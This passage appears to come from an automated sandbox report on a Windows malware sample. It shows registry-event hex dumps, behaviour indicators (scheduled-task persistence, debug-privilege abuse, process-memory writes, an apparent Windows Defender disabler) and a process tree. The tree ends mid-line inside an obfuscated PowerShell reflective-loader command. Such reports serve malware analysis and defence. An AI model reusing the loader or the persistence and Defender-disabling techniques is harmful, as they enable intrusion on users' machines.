6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33383536373465363632626366383333376630623465306437356530336534383838303439373764383265366662663839303836616133643738323935366635000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000079617369657574650000000000000000e4aa6f5acf077347a9d2f9f3b849919f46873f7b6a27f011abf8e2869430c066e4aa6f5acf077347a9d2f9f3b849919f46873f7b6a27f011abf8e2869430c066ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003900330030003500390037003500310033002d003700370039003000320039003200350033002d003700310038003800310037003200370035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000009ba18aa2000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0dc94e06-de9b-4ca9-9 = bebcb6b920c9db01 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0c8a10a5-b64f-4bac-b RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0c8a10a5-b64f-4bac-b = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000968744b920c9db01e659d8b920c9db01e659d8b920c9db011c4f13000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45ae6052000336265383835303337373333633835643466636139373434663431343732353863336164383361653565656335646235313036383639393731323266383531380000b20009000400efbeb45ae605b45ae6052e00000000000000000000000000000000000000000000000000b43d4100330062006500380038003500300033003700370033003300630038003500640034006600630061003900370034003400660034003100340037003200350038006300330061006400380033006100650035006500650063003500640062003500310030003600380036003900390037003100320032006600380035003100380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000b9a3793d1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33626538383530333737333363383564346663613937343466343134373235386333616438336165356565633564623531303638363939373132326638353138000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000079617369657574650000000000000000e4aa6f5acf077347a9d2f9f3b849919f4a873f7b6a27f011abf8e2869430c066e4aa6f5acf077347a9d2f9f3b849919f4a873f7b6a27f011abf8e2869430c066ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003900330030003500390037003500310033002d003700370039003000320039003200350033002d003700310038003800310037003200370035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000009ba18aa2000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\88462841-7528-431e-b RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\40936423-619e-4a4a-9 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000004c2ae5b820c9db014c2ae5b820c9db014c2ae5b820c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45ae6052000336265383835303337373333633835643466636139373434663431343732353863336164383361653565656335646235313036383639393731323266383531380000b20009000400efbeb45ae605b45ae6052e00000000000000000000000000000000000000000000000000b43d4100330062006500380038003500300033003700370033003300630038003500640034006600630061003900370034003400660034003100340037003200350038006300330061006400380033006100650035006500650063003500640062003500310030003600380036003900390037003100320032006600380035003100380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000b9a3793d1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33626538383530333737333363383564346663613937343466343134373235386333616438336165356565633564623531303638363939373132326638353138000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000079617369657574650000000000000000e4aa6f5acf077347a9d2f9f3b849919f45873f7b6a27f011abf8e2869430c066e4aa6f5acf077347a9d2f9f3b849919f45873f7b6a27f011abf8e2869430c066ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003900330030003500390037003500310033002d003700370039003000320039003200350033002d003700310038003800310037003200370035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000009ba18aa2000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0c8a10a5-b64f-4bac-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\386c21c9-9fb0-4da8-8 = "\\\\?\\Volume{A28AA19B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\385674e662bcf8337f0b4e0d75e03e488804977d82e6fbf89086aa3d782956f5" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74bc0ac8-5656-46a9-b RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\40936423-619e-4a4a-9 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\40936423-619e-4a4a-9 = "\\\\?\\Volume{A28AA19B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3be885037733c85d4fca9744f4147258c3ad83ae5eec5db510686997122f8518" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5880ef33-96c8-45b3-9 = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\88462841-7528-431e-b = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\386c21c9-9fb0-4da8-8 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\20a74ba0-d257-4c94-8 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9142683d-0df5-4154-8 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000098f0cab820c9db0198f0cab820c9db0198f0cab820c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45ae6052000373030613434353831356266343633366235646637343263353438663862346134623833333964646233663534646530303232373465376563613831373463650000b20009000400efbeb45ae605b45ae6052e0000000000000000000000000000000000000000000000000068775b00370030003000610034003400350038003100350062006600340036003300360062003500640066003700340032006300350034003800660038006200340061003400620038003300330039006400640062003300660035003400640065003000300032003200370034006500370065006300610038003100370034006300650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000b9a3793d1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37303061343435383135626634363336623564663734326335343866386234613462383333396464623366353464653030323237346537656361383137346365000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000079617369657574650000000000000000e4aa6f5acf077347a9d2f9f3b849919f41873f7b6a27f011abf8e2869430c066e4aa6f5acf077347a9d2f9f3b849919f41873f7b6a27f011abf8e2869430c066ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003900330030003500390037003500310033002d003700370039003000320039003200350033002d003700310038003800310037003200370035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000009ba18aa2000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0dc94e06-de9b-4ca9-9 = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5880ef33-96c8-45b3-9 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0c8a10a5-b64f-4bac-b = "\\\\?\\Volume{A28AA19B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3be885037733c85d4fca9744f4147258c3ad83ae5eec5db510686997122f8518" RuntimeBroker.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4008 schtasks.exe 724 schtasks.exe 3428 schtasks.exe 5556 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4600 x69.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1180 powershell.exe 1180 powershell.exe 1180 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4484 powershell.exe 4484 powershell.exe 4484 powershell.exe 2116 powershell.exe 2116 powershell.exe 4152 powershell.exe 4152 powershell.exe 4152 powershell.exe 2116 powershell.exe 1628 powershell.exe 1628 powershell.exe 1628 powershell.exe 1404 powershell.exe 1404 powershell.exe 1404 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 3672 powershell.exe 3672 powershell.exe 3672 powershell.exe 3900 powershell.exe 3900 powershell.exe 3244 powershell.exe 3244 powershell.exe 3900 powershell.exe 3244 powershell.exe 6096 powershell.exe 6096 powershell.exe 6096 powershell.exe 5620 powershell.exe 5620 powershell.exe 228 powershell.exe 228 powershell.exe 5620 powershell.exe 228 powershell.exe 3068 powershell.exe 3068 powershell.exe 3068 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 4604 powershell.exe 4604 powershell.exe 4604 powershell.exe 1220 powershell.exe 1220 powershell.exe 1220 powershell.exe 3336 powershell.exe 3336 powershell.exe 3336 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5832 powershell.exe 5832 powershell.exe 5832 powershell.exe 3100 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3500 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 884 250519-z3llfszks4.exe Token: SeDebugPrivilege 1180 powershell.exe Token: SeDebugPrivilege 4600 x69.exe Token: SeDebugPrivilege 5488 x69.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeDebugPrivilege 4484 powershell.exe Token: SeDebugPrivilege 4152 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeDebugPrivilege 3672 powershell.exe Token: SeDebugPrivilege 3900 powershell.exe Token: SeDebugPrivilege 3244 powershell.exe Token: SeDebugPrivilege 6096 powershell.exe Token: SeDebugPrivilege 5620 powershell.exe Token: SeDebugPrivilege 228 powershell.exe Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 3924 powershell.exe Token: SeDebugPrivilege 4604 powershell.exe Token: SeDebugPrivilege 1220 powershell.exe Token: SeDebugPrivilege 3336 powershell.exe Token: SeDebugPrivilege 4600 x69.exe Token: SeDebugPrivilege 5024 powershell.exe Token: SeDebugPrivilege 5832 powershell.exe Token: SeDebugPrivilege 3100 powershell.exe Token: SeDebugPrivilege 3916 powershell.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 2256 powershell.exe Token: SeDebugPrivilege 400 powershell.exe Token: SeDebugPrivilege 3156 powershell.exe Token: SeDebugPrivilege 4136 powershell.exe Token: SeDebugPrivilege 6088 powershell.exe Token: SeDebugPrivilege 3336 powershell.exe Token: SeDebugPrivilege 6112 powershell.exe Token: SeDebugPrivilege 4816 powershell.exe Token: SeDebugPrivilege 5792 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeDebugPrivilege 5724 powershell.exe Token: SeDebugPrivilege 1408 powershell.EXE Token: SeDebugPrivilege 4224 powershell.exe Token: SeDebugPrivilege 4612 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 4836 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 556 powershell.exe Token: SeDebugPrivilege 1408 powershell.EXE Token: SeDebugPrivilege 1584 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2212 svchost.exe Token: SeIncreaseQuotaPrivilege 2212 svchost.exe Token: SeSecurityPrivilege 2212 svchost.exe Token: SeTakeOwnershipPrivilege 2212 svchost.exe Token: SeLoadDriverPrivilege 2212 svchost.exe Token: SeSystemtimePrivilege 2212 svchost.exe Token: SeBackupPrivilege 2212 svchost.exe Token: SeRestorePrivilege 2212 svchost.exe Token: SeShutdownPrivilege 2212 svchost.exe Token: SeSystemEnvironmentPrivilege 2212 svchost.exe Token: SeUndockPrivilege 2212 svchost.exe Token: SeManageVolumePrivilege 2212 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2212 svchost.exe Token: SeIncreaseQuotaPrivilege 2212 svchost.exe Token: SeSecurityPrivilege 2212 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1668 Conhost.exe -
Suspicious use of UnmapMainImage 7 IoCs
pid Process 2704 svchost.exe 2704 svchost.exe 2704 svchost.exe 2704 svchost.exe 4104 RuntimeBroker.exe 5320 RuntimeBroker.exe 3500 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 884 wrote to memory of 1180 884 250519-z3llfszks4.exe 94 PID 884 wrote to memory of 1180 884 250519-z3llfszks4.exe 94 PID 884 wrote to memory of 4008 884 250519-z3llfszks4.exe 98 PID 884 wrote to memory of 4008 884 250519-z3llfszks4.exe 98 PID 684 wrote to memory of 4600 684 cmd.exe 103 PID 684 wrote to memory of 4600 684 cmd.exe 103 PID 884 wrote to memory of 5488 884 250519-z3llfszks4.exe 104 PID 884 wrote to memory of 5488 884 250519-z3llfszks4.exe 104 PID 884 wrote to memory of 4424 884 250519-z3llfszks4.exe 105 PID 884 wrote to memory of 4424 884 250519-z3llfszks4.exe 105 PID 884 wrote to memory of 724 884 250519-z3llfszks4.exe 107 PID 884 wrote to memory of 724 884 250519-z3llfszks4.exe 107 PID 884 wrote to memory of 1640 884 250519-z3llfszks4.exe 111 PID 884 wrote to memory of 1640 884 250519-z3llfszks4.exe 111 PID 884 wrote to memory of 1640 884 250519-z3llfszks4.exe 111 PID 884 wrote to memory of 4484 884 250519-z3llfszks4.exe 112 PID 884 wrote to memory of 4484 884 250519-z3llfszks4.exe 112 PID 1368 wrote to memory of 2236 1368 cmd.exe 114 PID 1368 wrote to memory of 2236 1368 cmd.exe 114 PID 1368 wrote to memory of 2236 1368 cmd.exe 114 PID 2236 wrote to memory of 2516 2236 x69Disable-winDefender.exe 115 PID 2236 wrote to memory of 2516 2236 x69Disable-winDefender.exe 115 PID 2236 wrote to memory of 2516 2236 x69Disable-winDefender.exe 115 PID 1640 wrote to memory of 5532 1640 x69Disable-winDefender.exe 116 PID 1640 wrote to memory of 5532 1640 x69Disable-winDefender.exe 116 PID 2236 wrote to memory of 4980 2236 x69Disable-winDefender.exe 118 PID 2236 wrote to memory of 4980 2236 x69Disable-winDefender.exe 118 PID 884 wrote to memory of 3428 884 250519-z3llfszks4.exe 119 PID 884 wrote to memory of 3428 884 250519-z3llfszks4.exe 119 PID 5532 wrote to memory of 4152 5532 cmd.exe 123 PID 5532 wrote to memory of 4152 5532 cmd.exe 123 PID 4980 wrote to memory of 2116 4980 cmd.exe 124 PID 4980 wrote to memory of 2116 4980 cmd.exe 124 PID 884 wrote to memory of 2916 884 250519-z3llfszks4.exe 127 PID 884 wrote to memory of 2916 884 250519-z3llfszks4.exe 127 PID 884 wrote to memory of 2916 884 250519-z3llfszks4.exe 127 PID 2916 wrote to memory of 4648 2916 x69install.exe 128 PID 2916 wrote to memory of 4648 2916 x69install.exe 128 PID 2916 wrote to memory of 4648 2916 x69install.exe 128 PID 4492 wrote to memory of 5056 4492 cmd.exe 129 PID 4492 wrote to memory of 5056 4492 cmd.exe 129 PID 4492 wrote to memory of 5056 4492 cmd.exe 129 PID 5532 wrote to memory of 1628 5532 cmd.exe 174 PID 5532 wrote to memory of 1628 5532 cmd.exe 174 PID 4980 wrote to memory of 1404 4980 cmd.exe 230 PID 4980 wrote to memory of 1404 4980 cmd.exe 230 PID 5532 wrote to memory of 2032 5532 cmd.exe 135 PID 5532 wrote to memory of 2032 5532 cmd.exe 135 PID 4980 wrote to memory of 3672 4980 cmd.exe 136 PID 4980 wrote to memory of 3672 4980 cmd.exe 136 PID 4600 wrote to memory of 3244 4600 x69.exe 175 PID 4600 wrote to memory of 3244 4600 x69.exe 175 PID 5532 wrote to memory of 3900 5532 cmd.exe 139 PID 5532 wrote to memory of 3900 5532 cmd.exe 139 PID 4980 wrote to memory of 6096 4980 cmd.exe 140 PID 4980 wrote to memory of 6096 4980 cmd.exe 140 PID 4600 wrote to memory of 228 4600 x69.exe 141 PID 4600 wrote to memory of 228 4600 x69.exe 141 PID 5532 wrote to memory of 5620 5532 cmd.exe 143 PID 5532 wrote to memory of 5620 5532 cmd.exe 143 PID 4980 wrote to memory of 3068 4980 cmd.exe 144 PID 4980 wrote to memory of 3068 4980 cmd.exe 144 PID 5532 wrote to memory of 3924 5532 cmd.exe 145 PID 5532 wrote to memory of 3924 5532 cmd.exe 145 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{59a02824-c996-495a-a3bb-0d0aef5ec34f}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1172 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MVKPIfBtMWRx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JSPZKwpHVeqSXx,[Parameter(Position=1)][Type]$jjPceJbftj)$uDkKYAhAQbC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 